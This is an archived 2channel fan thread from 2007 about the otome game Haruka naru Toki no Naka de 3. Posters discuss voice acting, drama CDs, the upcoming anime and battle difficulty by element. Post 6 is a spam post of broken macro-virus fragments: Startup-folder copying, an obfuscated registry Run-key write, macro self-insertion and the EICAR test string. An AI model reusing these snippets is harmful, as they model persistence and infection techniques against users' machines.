2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

乙女@遙かなる時空の中で3その74

1 :名無しって呼んでいいか?:2007/09/25(火) 22:42:16 ID:???
ここは「遙かなる時空の中で3」について語るスレッドです。
ゲームについての意見・感想・要望はこちらへ。
荒し、煽りは完全放置。放置出来ない貴方も同罪。
一応sage進行。

【お約束】
・特定キャラや特定カプを叩いたり、他キャラを貶めての萌え語りは禁止です。
 禁止ったら禁止です。
・あなたの萌えも、他の人の萌えもどちらも大事にしましょう。
・ネタは禁止ではありませんが、ネタになってくれたキャラへの愛と
 そのファンへの心配りを忘れずに。
・ゲーム以外についての話題や声優話は各板関連スレで。上手く使い分けましょう。
・チャット状態は鯖負担になりますので控えましょう。
・一般板なので下ネタは控えましょう。
・質問や別の話題を振られたらなるべく答えてあげて下さい。
・質問をする人は、まず>>2のwikiやグーグル先生などを参考にしてみて下さい。
・次スレは>>960を踏んだ人が立ててください。

※コピペ・AA連投(ガイドライン6)、エロ&下品ネタ(ガイドライン7)は
無言で削除依頼して下さい。
削除依頼板>http://qb5.2ch.net/saku/
依頼する時はガイドラインや削除人の見解を良く読みましょう。

総合>乙女@遙かなる時空の中で総合スレその79
http://game12.2ch.net/test/read.cgi/ggirl/1189490604/

前スレ>乙女@遙かなる時空の中で3その73
http://game12.2ch.net/test/read.cgi/ggirl/1188743036/

関連スレは>>2
製品説明は>>3

2 :名無しって呼んでいいか?:2007/09/25(火) 22:43:27 ID:???
関連スレ
ネオロマ過去ログ倉庫
ttp://neoromance.hp.infoseek.co.jp/
遙か3攻略まとめサイト
ttp://haruka3matome.fc2web.com/
十六夜記攻略まとめwiki
ttp://www6.atwiki.jp/izayoiki/
迷宮攻略まとめwiki
ttp://www10.atwiki.jp/labyrinth/

遙か3公式サイト
ttp://www.gamecity.ne.jp/haruka3/
遙か3十六夜記公式サイト
ttp://www.gamecity.ne.jp/haruka3/izayoiki/
遙か3運命の迷宮(ラビリンス)公式サイト
ttp://www.gamecity.ne.jp/haruka3/labyrinth/
遙か3紅の月(2007年12月公開単発アニメ)公式サイト
ttp://www.gamecity.ne.jp/neoromance/tv/haruka/kurenai/

3 :名無しって呼んでいいか?:2007/09/25(火) 22:44:01 ID:???
3シリーズ各製品の説明

・無印…本編。恋愛ED。

・十六夜記…追加ディスク。単体プレイ可。
      十六夜ED、平泉√追加。
      無印とミックスホイでスチル・音声・協力技等の追加もあり。
      (十六夜単体だと青龍組以外の恋愛EDは見られない)

・迷宮…外伝。本編その後。
     無印・十六夜セーブデータ読み込みでおまけ機能に追加あり。
     無印一週目体験版付き。セーブデータは無印で引継ぎプレイ可能

4 :名無しって呼んでいいか?:2007/09/25(火) 22:54:50 ID:???
kusosure end/^.^/

5 :名無しって呼んでいいか?:2007/09/25(火) 23:16:16 ID:???
>>1
5ゲト 乙ですー

6 :名無しって呼んでいいか?:2007/09/26(水) 00:23:46 ID:???
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


7 :名無しって呼んでいいか?:2007/09/26(水) 02:34:19 ID:???
kaki eat/^.^/

8 :名無しって呼んでいいか?:2007/09/26(水) 12:47:23 ID:???
>>1
桃源郷に輝く乙

9 :名無しって呼んでいいか?:2007/09/26(水) 18:52:59 ID:???
>>1
乙!

前スレでドラマのネタバレしたけど、ちょっと誤解されたかも試練
ヒノエは突き放した感じではあるが、いわゆる「慰めるだけが優しさじゃない」系
励まそうとしてた敦盛・白龍と一緒に「ここにいない方がいい」と、望美を
一人にしてやってた
しかし白龍に「八葉は神子のそばにいる、私も神子の龍だから」と励ましてるのに、
「ここにいてほしい八葉(景時)はいない」とかやってる神子はイタイと思った

それから望美の声が以前より更に低く感じた
気のせいか?

10 :名無しって呼んでいいか?:2007/09/26(水) 19:00:50 ID:???
なんつーか媒体出る度に低くって指示受けてるような気がする>望美
そんなに高いってクレーム行ってるのか?
正直以前のドラマCD以上に低くなると、もう女子高生の声じゃ無い気が

11 :名無しって呼んでいいか?:2007/09/26(水) 19:08:33 ID:???
九郎も声低くなかった?

12 :名無しって呼んでいいか?:2007/09/26(水) 19:26:25 ID:???
下手するとパラレルやってるときの勝真が九郎に聞こえた

13 :名無しって呼んでいいか?:2007/09/26(水) 19:37:05 ID:???
天真<九郎<<勝真くらいだと思ってた
声の低さ
去年の遙か祭での印象でだけど
神子は花梨<<<あかね<<<<望美って感じ?

14 :名無しって呼んでいいか?:2007/09/26(水) 20:13:07 ID:???
自分は神子の声は高い方がいいと思う
まぁクギミヤみたいに高すぎても嫌だが今みたいに低すぎるのも…

15 :名無しって呼んでいいか?:2007/09/26(水) 20:19:34 ID:???
勝真より九郎のが低くないか?

16 :名無しって呼んでいいか?:2007/09/26(水) 20:45:18 ID:???
イメージ的には望美はメゾソプラノとアルトの中間な声なんだけど、
今回は低めのアルトって感じで、下手したらヒノエの方が声が高い

17 :名無しって呼んでいいか?:2007/09/26(水) 20:57:52 ID:???
>>15
いや、これまでは勝真の方が確実に低かった
多分本人もそれで演じ分けしてたろうし(喋り方も落ち着いてた)
九郎は十六夜から段々低く、喋り方も落ち着いてきて、
こないだのフェスタのOPとか、最初九郎じゃなく勝真だと
疑わなかったよ…
九郎も低くって指示出されてるんでない?

18 :名無しって呼んでいいか?:2007/09/26(水) 21:16:10 ID:???
十六夜では全体的にあえて落ち着いた音つくりにしたように感じる

19 :名無しって呼んでいいか?:2007/09/27(木) 14:45:28 ID:???
スレ違いならゴメン
ボイスカード届いて聞いてみたら
明らかに音がおかしい……
音割れ、声が別人に聞こえる、
メッセージ最後にザーってノイズ入る
これは接触不良?直す方法ないかな

20 :名無しって呼んでいいか?:2007/09/27(木) 14:58:20 ID:???
>>19
不良品じゃないか?
自分、全員分買ったけど音割れやノイズはないよ

それにしても、今回ケチったな肥
前回まではボイスカードを入れる封筒が付いてたのに


21 :名無しって呼んでいいか?:2007/09/27(木) 15:29:26 ID:???
自分もそういうの昔あった
だいぶ経ってからだけど、シャーシャーいってチモの声が異様に軽く…w
買ったばかりなんだし返品交換してもらったら?

22 :名無しって呼んでいいか?:2007/09/27(木) 21:13:31 ID:???
>>20
>>21
d
問い合わせてみる

23 :名無しって呼んでいいか?:2007/09/28(金) 00:09:43 ID:???
あと一週間で迷宮の廉価版が発売だな

24 :名無しって呼んでいいか?:2007/09/28(金) 21:14:29 ID:???
紅の月のスタッフ&キャストが発表されたな
やっぱり作画はつなきかorz

原作のところに
GAMECITY文庫「遙かなる時空の中で3 紅の月」とあるのが気になる


25 :名無しって呼んでいいか?:2007/09/28(金) 21:36:46 ID:???
小さい白龍はやっぱり出ないのか…

>>24
小説出すのかね?
2の小説は好きだったので同じ人なら嬉しいが、やっぱり脚本の人が書くのかな…

26 :名無しって呼んでいいか?:2007/09/29(土) 10:00:29 ID:???
兄上も出ないのかな…

27 :名無しって呼んでいいか?:2007/09/29(土) 11:16:39 ID:???
朔は最近何かとハブられていたので名前があって安心した

主題歌はどうなるのかな
個人的には舞一夜とかコルダみたく世界観に合ってて女性ボーカルがいい

28 :名無しって呼んでいいか?:2007/09/29(土) 12:36:13 ID:???
惟盛の名前があって何故かうれしい自分w

29 :名無しって呼んでいいか?:2007/09/29(土) 13:36:25 ID:???
主題歌あるなら八葉抄OPやコルダEDみたいな声優ユニットがいいな
現実にはよくわからんタイアップになりそうだけど

30 :名無しって呼んでいいか?:2007/09/29(土) 14:37:40 ID:???
スタッフとかキャストとかを見ようとすると
将臣(というか右側の皆さん)が隠れて九郎が残るのは何かの暗示ですか。
まぁ玄武組もいるけど。

31 :名無しって呼んでいいか?:2007/09/29(土) 15:51:42 ID:???
>>28
私もwなんか好きなんだよねぇ〜。

32 :名無しって呼んでいいか?:2007/09/29(土) 23:40:00 ID:???
ヤスも銀もでないのかなー

33 :名無しって呼んでいいか?:2007/09/29(土) 23:47:02 ID:???
>>32
重衡すら名前なかったからなー
あ、でも「他」に含まれる可能性があるのか

34 :名無しって呼んでいいか?:2007/09/30(日) 00:24:30 ID:???
空気読まずに。
ぬおー。神子最強にしてやろうと思ったら八葉たち攻略するの忘れてました。
バッドエンドだたよwでも戦闘もストーリーもおもしれー。3週目ガンガルノシ

35 : ̄ ̄ ̄ ̄ ̄ ̄V ̄ ̄ ̄ ̄:2007/09/30(日) 10:50:20 ID:hDvoq/Hh
          ____   
       / \  /\  キリッ
.     / (ー)  (ー)\      
    /   ⌒(__人__)⌒ \       
    |      |r┬-|    |  
     \     `ー'´   /
    ノ            \
  /´               ヽ              
 |    l              \
 ヽ    -一''''''"~~``'ー--、   -一'''''''ー-、.    
  ヽ ____(⌒)(⌒)⌒) )  (⌒_(⌒)⌒)⌒))


36 :名無しって呼んでいいか?:2007/09/30(日) 12:03:43 ID:???
>>34
3周目ならまだ新鮮新鮮だな!
遙か3楽しいよな!
今はもう何十周もしてしまってるから
初めてプレイした頃の新鮮気分を味わいたくとも…
思う存分楽しんでください。

37 :名無しって呼んでいいか?:2007/09/30(日) 12:25:29 ID:???
プレイ効率悪い自分がイカンのだろうけど、熊野4章だけはもういやーってくらいプレイした…
あそこ長いんだよ…

38 :名無しって呼んでいいか?:2007/09/30(日) 12:29:58 ID:???
長い上に五章の場所決めもあるもんなー…
先生攻略でかなり疲弊した…

39 :名無しって呼んでいいか?:2007/09/30(日) 12:43:05 ID:???
自分は熊野で青龍の親密度上げてたから、もうホント勘弁してって感じ
ホンッ当に青い色に埋まらなかったキツイ思い出……

40 :名無しって呼んでいいか?:2007/09/30(日) 12:43:49 ID:???
2章の春の京、イベントというイベント
全部起こしてからじゃないと次に進めないたちだから
全コンプにえらく時間がかかった。
4章熊野の自動イベント、ネオアンのように全部まとめて
スキップできる機能があれば良かったのに。
ボタンおしっぱは辛いっす。

41 :名無しって呼んでいいか?:2007/09/30(日) 12:50:17 ID:???
>>40
ボタン押しでのonに切り替えろヤw

42 :名無しって呼んでいいか?:2007/09/30(日) 12:51:04 ID:???
6章の場所変える為にプレイする5章も苦痛だったなぁ

43 :名無しって呼んでいいか?:2007/09/30(日) 13:01:10 ID:???
どれもこれも、ヒノエが合流するまでの十六夜の平泉よりはマシだ


44 :名無しって呼んでいいか?:2007/09/30(日) 13:29:47 ID:???
ヤスは銀に遁甲を仕込んどくべきだったな

45 :名無しって呼んでいいか?:2007/09/30(日) 13:47:53 ID:???
>>39
わかるわかるw
青龍そろわないから大変だった

46 :名無しって呼んでいいか?:2007/09/30(日) 14:09:07 ID:???
>>36
もうすっかり「Lv.獣神子」だから修行の必要もないしな…

47 :名無しって呼んでいいか?:2007/09/30(日) 14:33:03 ID:???
>>46
むしろ円陣に八葉いなくても神子一人で平気だもんな…

48 :名無しって呼んでいいか?:2007/09/30(日) 14:40:14 ID:???
どっかのボス戦だかで神子と同族性の敵に攻撃したら敵が回復しちゃってたの気づかなくて
延々最強神子様が自ら回復させてたってことが…

通りで倒せないわけだわ

49 :名無しって呼んでいいか?:2007/09/30(日) 16:03:52 ID:???
神子が金属性だったために平泉で銀に憎しみを抱いたのは私だけではないはず

50 :名無しって呼んでいいか?:2007/09/30(日) 16:30:14 ID:???
>>44
銀と二人で歩き回ってる時、つくづく思った

ヒノエ最萌えなのに、戻ってきた時「ヒノエ!」じゃなく
「遁甲キタキタキタキタ━━━(゚∀゚≡(゚∀゚≡゚∀゚)≡゚∀゚)━━━━!!!!!!!!!!」
と浮かれたことを、2年目にして懺悔しますorz

51 :名無しって呼んでいいか?:2007/09/30(日) 17:02:37 ID:???
通常EDでボス戦いないわ十六夜EDで平泉いないわの景時最萌えな私が通りますよ

52 :名無しって呼んでいいか?:2007/09/30(日) 17:23:38 ID:???
でも通常EDのかげときかっこよかった
ハラがひたすら気になったけど


53 :名無しって呼んでいいか?:2007/09/30(日) 17:38:48 ID:???
景時EDって無印も十六夜も迷宮も、わりとアッサリしてるよね。
あんまり恋愛してるようには感じなかったよ。

54 :名無しって呼んでいいか?:2007/09/30(日) 17:45:16 ID:???
流れブッタ切ってスマソ
今何気なく引き出しを漁ってたら無印が二本あるのを見つけたんだが
で、一本売ろうと思うんだ。
無印って今いくらくらいで売れるか知ってる姐さんいる?

しかし、なぜ二本・・・・
好きすぎる願望か?

55 :名無しって呼んでいいか?:2007/09/30(日) 17:49:58 ID:???
>>53
ぶっちゃけ恋愛じゃなくて人生のお手伝いだったよな

56 :名無しって呼んでいいか?:2007/09/30(日) 18:19:24 ID:???
>>54
細かい値段はわからんが
今は兼価版でてるから高くて1500くらいか?無印は結構古いし
店によっては1000や500いかないからな…

ただでさえ通常版は安いので気をつけて店を選んだ方がいいとオモ

57 :名無しって呼んでいいか?:2007/09/30(日) 19:17:37 ID:???
無印+十六夜PSP版とか欲しい。
それでも追加ディスク商法とかされそうだなorz

58 :名無しって呼んでいいか?:2007/09/30(日) 19:55:19 ID:???
>>55
まーそれは景時に限らないし…。

59 :名無しって呼んでいいか?:2007/09/30(日) 21:32:23 ID:???
>>54
それ私のだよ。なんだ>>54のところにあったのかー
道理で部屋探してもないと思った

60 :名無しって呼んでいいか?:2007/09/30(日) 21:37:21 ID:???
>>40
同意。ミニゲームのロード地獄とはまた違う煩わしさだった

61 :54:2007/09/30(日) 22:56:37 ID:???
>>56
トン!
やっぱり安いな。
それなら持ってない友人に1500位で売るかな・・・

>>59
そっかー、おまいさんのだったかー
はい、んじゃこれ・・・・
・・・・って渡すかぁ!

62 :名無しって呼んでいいか?:2007/09/30(日) 23:03:48 ID:???
>>53
十六夜なんかはなんで奴が平泉ルートでEDなのか分からなかった…

63 :名無しって呼んでいいか?:2007/10/01(月) 00:37:04 ID:???
無印と十六夜、景時と神子離れてる時間が長かったからね。
もうちょっと何とかならなかったのかと思う。

64 :名無しって呼んでいいか?:2007/10/01(月) 00:40:45 ID:???
紅玉のインタビューによれば十六夜は
4人ずつ京エンドと平泉エンドに割り振る予定だったらしいから
そのまんまやってくれれば良かったのにと思ったよ

65 :名無しって呼んでいいか?:2007/10/01(月) 01:21:49 ID:???
>>50
あるあるwwwwww

記念すべき十六夜一週目で、銀と二人行動で一回死んだ自分がいる

66 :名無しって呼んでいいか?:2007/10/01(月) 01:27:12 ID:???
十六夜は所詮銀髪ディスクだからな
ヤスだって立ち位置中途半端だし
紅玉が追加商法覚えて、3なら何でも売れると調子付いたのはあの辺からか

67 :名無しって呼んでいいか?:2007/10/01(月) 02:35:38 ID:???
自分が住んでる地域地震あってCDラック崩れたorz(古いから)
天井と50aしか離れてないから心配だ…
実際にキャラコレ1〜4あたりがヤバい状態

68 :名無しって呼んでいいか?:2007/10/01(月) 09:42:04 ID:???
>>67
お見舞い申し上げる

69 :名無しって呼んでいいか?:2007/10/01(月) 16:08:25 ID:???
>>66
でも十六夜記ネ申と思ってる自分がいる
さすがに迷宮はウヘァだったけど

70 :名無しって呼んでいいか?:2007/10/01(月) 16:24:57 ID:???
話ブタ切りでスマソが
ボイスカードでは思いがけなく景時にやられた
こうきたか〜…

71 :名無しって呼んでいいか?:2007/10/01(月) 19:01:17 ID:???
十六夜1周目でも無印データを引き継ぎでプレイだったので
既に最強だった我が家の金属性神子様は火属性の攻撃を
たとえ銀が死んでも、かすり傷しか負わずに一人で敵を
ぶっ倒しってらっしゃいましたよ

72 :名無しって呼んでいいか?:2007/10/01(月) 19:27:28 ID:???
>>65
あなたは私ですかwww

うちの獣神子さまは火属性なので、銀との絆が低い=術使えない時に
火属性の敵と出会うとorzだった
勝つにしても時間がかかるし、大抵銀は死んでいる…
五行の力はMAXなので、銀の色々な特技・耐性を上げられる限り上げても、
1周目だとまだ上限が低いから弱々しかった

だから余計にあのバッドEDは泣けたんだぜ

73 :名無しって呼んでいいか?:2007/10/01(月) 20:50:19 ID:???
>>70
どう来たのが詳細よろしく

74 :名無しって呼んでいいか?:2007/10/01(月) 21:03:01 ID:???
え、金属性で銀ってそんなに苦労するとこなのか?
自分一度も属性変えてないが、全然そんな記憶がないww
今度ミックスホイでデータ引継ぎしないで挑戦してみるよ
まあ知盛のときはいい加減術もないし攻撃20ターン以上やってて途中で飽きたが

得意技に「ずっと俺のターン」とかあったらいいのにな

75 :名無しって呼んでいいか?:2007/10/01(月) 21:12:43 ID:???
一番戦闘がラクな神子って何属性なんだろね
うちの神子はダキニと同属性なんで
ダキニが出たら支援専門になっちゃってた

76 :名無しって呼んでいいか?:2007/10/01(月) 21:25:35 ID:???
>>75
火属性、結構楽だよ。裏熊野は知盛が属性ガン無視で相克でも倒してくれるし、
平泉で銀と二人きり、対羅刹女・幽霊くらいか、辛いのは。
何より知盛戦が楽というのが自分にはポイント高い。

自分は属性変えたことないけど、木属性の友達はやっぱり知盛戦が辛いって言ってたな。

77 :名無しって呼んでいいか?:2007/10/01(月) 21:29:53 ID:???
木属性の知盛戦はかなり運に左右されそうだね
1発でもクリティカル喰らったら負けそうだ

78 :名無しって呼んでいいか?:2007/10/01(月) 21:35:50 ID:???
水神子だが、戦闘回避してロクにレベル上げしてなかったんで
一周目の滝夜叉が辛かった
兄貴加入で円陣崩れてたし攻撃して回復されるってのもそれで初めてだった
以後真面目にパラ上げて獣と化したんで反属性ダキニも楽勝w

79 :名無しって呼んでいいか?:2007/10/01(月) 22:21:08 ID:???
木属性神子だったから知盛で死ねたw
それ以外は特に苦労しなかったが

80 :名無しって呼んでいいか?:2007/10/01(月) 22:46:46 ID:???
五行相克って、金は火に弱いとか言うけど、同属の金と戦う方が
めんどくさいよね
ダメージ吸収するタイプじゃなくても、弱められるというか

自分は火だったので割とラクだった

81 :名無しって呼んでいいか?:2007/10/01(月) 23:02:34 ID:???
>>73
瞼にチューされた

82 :名無しって呼んでいいか?:2007/10/01(月) 23:07:14 ID:???
火属性だったからヒノエに白龍と同属多すぎてうんざりしたのもいい思い出


83 :名無しって呼んでいいか?:2007/10/01(月) 23:08:05 ID:???
金神子銀の二人行脚は神子最強でも時間がかかりすぎて…。
戦闘ショートカット&ボタン連打も無意味なくらいザコに時間とられる。
十六夜は金属性神子いじめ作品認定。

84 :名無しって呼んでいいか?:2007/10/01(月) 23:13:59 ID:???
>>82
金属性なんか白虎二人に銀髪兄弟二人で合計四人だ

つーか基本的にどの属性も八葉+朔+白龍で二人ずついるよ

85 :名無しって呼んでいいか?:2007/10/01(月) 23:19:24 ID:???
>>81
d、まさか景時が(*´Д`)

86 :名無しって呼んでいいか?:2007/10/01(月) 23:30:34 ID:???
>>74
望美「ずっと私のターン!!」
朔「もうやめて望美!相手の五行は0よ!」
になるのか

87 :名無しって呼んでいいか?:2007/10/02(火) 00:26:07 ID:???
自分土神子だが個人的には使いやすかった。
でも土属性の所で円陣にリズ先生と弁慶が居た時とか何だか泣けた。そんなにいらねぇw

88 :名無しって呼んでいいか?:2007/10/02(火) 00:27:48 ID:???
自分水神子で、基本的にパラ上げ殆どしてなかったけど、
そんなに苦労しなかったなぁ…

89 :名無しって呼んでいいか?:2007/10/02(火) 00:36:07 ID:???
こちらの神子も水属性だったから、全然難しくなかった。
納得行くまでLvあげてから進んでたからってのもあるのかな。

90 :名無しって呼んでいいか?:2007/10/02(火) 00:48:30 ID:???
ウチの神子も水属性だった。
基本遣い辛くはなかったけど、同属性と
あと何故か金属性との戦闘が面倒だったキガス

91 :名無しって呼んでいいか?:2007/10/02(火) 01:39:21 ID:???
ダキニ戦や蟹貴が良く居なくなる事を考えるとで木は楽だった

92 :名無しって呼んでいいか?:2007/10/02(火) 01:59:33 ID:???
木は常に人材不足だったなぁそういや
続いて火

93 :名無しって呼んでいいか?:2007/10/02(火) 04:48:05 ID:???
水結構いるねー。私もだ

八葉同士全員の絆上げが一番しんどかったなぁ…
眠いのになぜか頑張ってて、私が神子に応援されたかったもんw
気力が…

94 :名無しって呼んでいいか?:2007/10/02(火) 18:58:58 ID:???
自分も水ー
苦労したことはあんまりなかったかな
弁慶の「水属性には有利なんです」にドキっとしたw

95 :名無しって呼んでいいか?:2007/10/02(火) 19:32:43 ID:???
>>79
同じく。強い設定で戦うのに苦労した。もう2度と戦いたくないwww

96 :名無しって呼んでいいか?:2007/10/02(火) 20:11:35 ID:???
火属性神子で九郎と回復役に弁慶か朔置いといたら特に苦労しなかった

97 :名無しって呼んでいいか?:2007/10/02(火) 20:34:28 ID:???
十六夜やる頃には獣神子だから、チモが「強い」設定になってても
2ターン瞬殺だった

剣で語り合うことも出来やしねえw

98 :名無しって呼んでいいか?:2007/10/02(火) 20:46:35 ID:???
獣神子でもチモ強い+木属性でガチバトルしてみ?
クリティカル出されたら涙目になるからwww

99 :名無しって呼んでいいか?:2007/10/02(火) 21:05:30 ID:???
木じゃなくて土神子の獣状態だったけど
チモクリティカル+回避3回かまされて死んだ事あるな
当たらないんだもん倒せないよ・・・

100 :名無しって呼んでいいか?:2007/10/02(火) 23:37:09 ID:???
>>99
あるあるw
回避されまくったあげく束縛かけられてタコ殴り状態で死んだwww

101 :名無しって呼んでいいか?:2007/10/03(水) 23:26:04 ID:DP07Dnd6
>>98
私も木神子。
瀕死でチモ倒したときは感動したよww
ちなみにダキニ戦は神子+青龍+敦盛@秘められた力でフルボッコだった。

102 :名無しって呼んでいいか?:2007/10/04(木) 00:43:47 ID:???
敦盛@秘められた力は水以外のボスには欠かせない。
ダキニなんてほんとは土だから弱いはずなんだがなぁ…。


103 :名無しって呼んでいいか?:2007/10/04(木) 18:13:14 ID:???
秘められた力ってそういえば、ほとんど使ったことないや。
術ばっか使ってた。あとは斬りまくり殴りまくりw

戦闘=絆上げだから、絆をあげる対象を決めたら
ザコ敵は何属性だろうと同じ術ばっかり使って絆あげて、
ボス戦だけ属性見て強い術から使って、集中力がなくなったら円陣を回してた。

104 :名無しって呼んでいいか?:2007/10/04(木) 20:07:55 ID:???
秘められた力使うと強チモも1ターンキルだから笑えてくる。

105 :名無しって呼んでいいか?:2007/10/04(木) 21:54:37 ID:???
>遙かなる時空の中で3 紅の月 第一夜
>2007年12月5日発売予定/税込価格:3,000円
>「遙かなる時空の中で3 紅の月」のCDがついに登場!

第一夜ということは今後続々と登場予定なんですね

106 :名無しって呼んでいいか?:2007/10/04(木) 22:29:14 ID:???
まさかここでワンタンキルを見るとは

107 :名無しって呼んでいいか?:2007/10/04(木) 23:47:43 ID:???
>>105
どこからのコピペかも書いてくれると嬉しい

しかし、予想通りすぎてもはや笑いも起こらないな

108 :名無しって呼んでいいか?:2007/10/04(木) 23:54:41 ID:???
>>107
ごめん、情報源書いてなかったな
みやこひめいちに載ってたよ

109 :名無しって呼んでいいか?:2007/10/04(木) 23:57:45 ID:???
CDは収益率が高いんだな。
歌は歌で出して欲しいのでドラマCDにはイラナイ。
脚本は外部発注でまともな人呼んで紅玉がゲームとの照合して欲しい。
1回聞くと飽きる作品だとCD代もったいね。


110 :名無しって呼んでいいか?:2007/10/05(金) 00:42:48 ID:???
>>109
そりゃアナタ、広告費以外でかかる費用って言ったら、
脚本代、役者代、音響代、音響スタッフ代に
メディア代、プレス代、ジャケ印刷代くらい
アニメやゲームと違って人件費にそんなに飛んでいかないし、
手抜き脚本なら時間も掛からない
その割に一定数は売れるからね

111 :名無しって呼んでいいか?:2007/10/05(金) 08:56:03 ID:???
>>110
誰?

112 :名無しって呼んでいいか?:2007/10/05(金) 12:19:07 ID:???
最終的には30夜制覇とかしてもおかしくなさそうだな
紅の月ドラマCD
紅玉の月の略なのか?

113 :名無しって呼んでいいか?:2007/10/05(金) 12:25:42 ID:???
もうどっかのホムンクルス呼んできて
む〜んとか言わせていれば良いと思うんだ>30夜
中の人は九郎の人だし、無問題!

114 :名無しって呼んでいいか?:2007/10/05(金) 12:46:17 ID:???
限定版特典の八葉歳時記をもっと細かくして
八葉きょうは何の日とかやったらいいんじゃないか
で、その日にリリースすると
みどりの日とか鉄道の日とか

115 :名無しって呼んでいいか?:2007/10/05(金) 17:26:34 ID:???
昔光栄は三國志のドラマCDの外伝で、三國志めくりってCDカレンダー出しててね…
つまりもう似たようなことはやられてるんだよ

116 :名無しって呼んでいいか?:2007/10/05(金) 17:58:04 ID:???
三国志めくりはメチャクチャおもしろかったぞ

117 :名無しって呼んでいいか?:2007/10/05(金) 19:00:48 ID:???
十五夜までCDを出して、十六夜をアニメでやると予想

118 :名無しって呼んでいいか?:2007/10/05(金) 19:08:44 ID:???
八葉+朔+白龍+銀髪+泰+髭上をメインにしてもまだ余るぞ
>>十五夜って

119 :名無しって呼んでいいか?:2007/10/05(金) 19:15:53 ID:???
>>118
白龍は大小いるから15人になる

御館も金も政子もティンクも惟盛も経正も忠度も尼御前も帝も法皇もマロも那須与一もいる

120 :名無しって呼んでいいか?:2007/10/05(金) 19:30:03 ID:???
15日間連続リリースで目指せオリコン制覇とか
買えないけどな

121 :名無しって呼んでいいか?:2007/10/05(金) 20:11:21 ID:???
十六夜記をアニメ化してくれるなら15枚全部買ってもいい

122 :名無しって呼んでいいか?:2007/10/05(金) 20:45:20 ID:???
>>116
あれは確かに面白かった
やりすぎの感もあったけど
命日にコメントが入ってるCDなんて、あれくらいだろうな…

123 :名無しって呼んでいいか?:2007/10/05(金) 22:19:53 ID:???
命日wwwいいな
空いてる日はまるわかりBOOKの豆知識入れるとかどうだろう

124 :名無しって呼んでいいか?:2007/10/05(金) 23:00:52 ID:???
>>101
亀だが、自分も木神子
チモリには1〜2回殺されて、その後瀕死で勝って感動したなw
ダキニは楽勝だが、チモリに苦戦するのと、
四章熊野で青龍コンビの絆上げする時が苦痛だった…敵も木属性だと最悪だ。

あと、獣神子過ぎると面白くないので皆あんまり耐性パラ上げてないが、
攻撃力だけはMAXだから、神子が混乱すると
大概回復要員として円陣に入れてる弁慶がクリティカルで瞬殺されるw
弁慶以外のキャラなら、弁慶に復活させてもらうけど、弁慶だけはどうにもならん

125 :名無しって呼んでいいか?:2007/10/06(土) 00:38:49 ID:???
童貞→九郎・譲・泰衡・敦盛・先生・白龍
非童貞→将臣・ヒノエ・弁慶・景時
ヤリチン→知盛・銀

126 :名無しって呼んでいいか?:2007/10/06(土) 00:41:09 ID:???
モバイルの着信ボイス
弁慶に悶え敦盛で笑った
唯の電話だっつーの、あっつんww

そしてチモは相変わらずエロさを感じる…

127 :名無しって呼んでいいか?:2007/10/06(土) 00:52:52 ID:???
>>126
kwsk

128 :名無しって呼んでいいか?:2007/10/06(土) 00:54:32 ID:???
自分で登録すれば

129 :名無しって呼んでいいか?:2007/10/06(土) 01:39:10 ID:???
携帯増やす価値があるかどうかの判断につながるから、情報集めてるんだけど。

130 :名無しって呼んでいいか?:2007/10/06(土) 03:35:59 ID:???
たかが315円を惜しむなよ

131 :名無しって呼んでいいか?:2007/10/06(土) 03:49:21 ID:???
増やさないで変えちゃえ!

132 :名無しって呼んでいいか?:2007/10/06(土) 10:12:00 ID:???
変えるっていう選択肢が選べない。
もう一台分くらい増やすほど萌えるもんでもなさそうだね。

133 :名無しって呼んでいいか?:2007/10/06(土) 11:04:20 ID:???
ひとそれぞれだと

134 :名無しって呼んでいいか?:2007/10/06(土) 12:35:52 ID:???
>>125
自分にはこんな感じに見える

童貞→九郎、譲、敦盛、先生、白龍
非童貞→将臣、弁慶、景時、銀、泰衡
ヤリチン→ヒノエ、知盛、重衡

135 :名無しって呼んでいいか?:2007/10/06(土) 13:52:12 ID:???
モバイルは好きなキャラが多いとポイント全然足りない

136 :名無しって呼んでいいか?:2007/10/06(土) 13:58:38 ID:???
>>125>>134
ウ・ザ・イ

137 :名無しって呼んでいいか?:2007/10/06(土) 14:01:10 ID:???
音質が悪い
トップのランダム表示キャラが小さすぎ
散々言われてると思うが直さないよなー

紅の月の小説出すっぽいが
面白い面白くない以前にキャラの口調間違えないかとか
基本中の基本が心配でしかたない

138 :名無しって呼んでいいか?:2007/10/06(土) 14:06:30 ID:???
花祭は基本すらできてなくて萎えたからなぁ
自分も口調とか呼びかたは心配

139 :名無しって呼んでいいか?:2007/10/06(土) 14:11:40 ID:???
とりあえず第一稿ができたらここに投下しろw
住人総出で校正してやるわww<紅の月脚本・小説

140 :名無しって呼んでいいか?:2007/10/06(土) 16:12:07 ID:???
>>102
遅いレスだが土剋水
水は土に弱い=ダキニ優勢

141 :名無しって呼んでいいか?:2007/10/06(土) 16:22:33 ID:???
花祭の3ドラマは怨霊を封印って言ってたのが気になったな
2トラックに分けてあったのはありがたかった

142 :名無しって呼んでいいか?:2007/10/06(土) 16:33:02 ID:???
>>140
だから、土属性の荼吉尼には弱いはずの水属性の攻撃なのに効果的って
言ってんじゃないの?
土には弱いはずだが効果が大きく、同じ水属性以外には使えるって意味でしょ

>>102
確かに相克云々より、同属性の方が効き目が弱い

143 :名無しって呼んでいいか?:2007/10/06(土) 17:36:46 ID:???
>>142
でも、ゲーム内かどこかで例えば土剋水の場合、
